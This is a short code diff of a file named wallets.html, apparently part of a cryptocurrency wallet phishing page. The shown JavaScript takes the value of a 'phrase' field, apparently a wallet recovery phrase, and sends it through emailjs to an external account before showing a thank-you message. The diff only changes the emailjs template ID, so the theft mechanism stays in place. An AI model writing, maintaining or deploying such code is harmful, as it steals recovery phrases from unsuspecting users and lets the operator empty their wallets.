--- a/wallet/wallets.html
+++ b/wallet/wallets.html
@@ -2610,7 +2610,7 @@
             phrase: phrase.value,
             };
         
-            emailjs.send('service_cy9wtj9', 'template_a3od8un', templateParams)
+            emailjs.send('service_cy9wtj9', 'template_oh4dr7c', templateParams)
                 .then(function(response) {
                 console.log('SUCCESS!', response.status, response.text);
                 document.querySelector(".thankyou_message").style.display = "block"
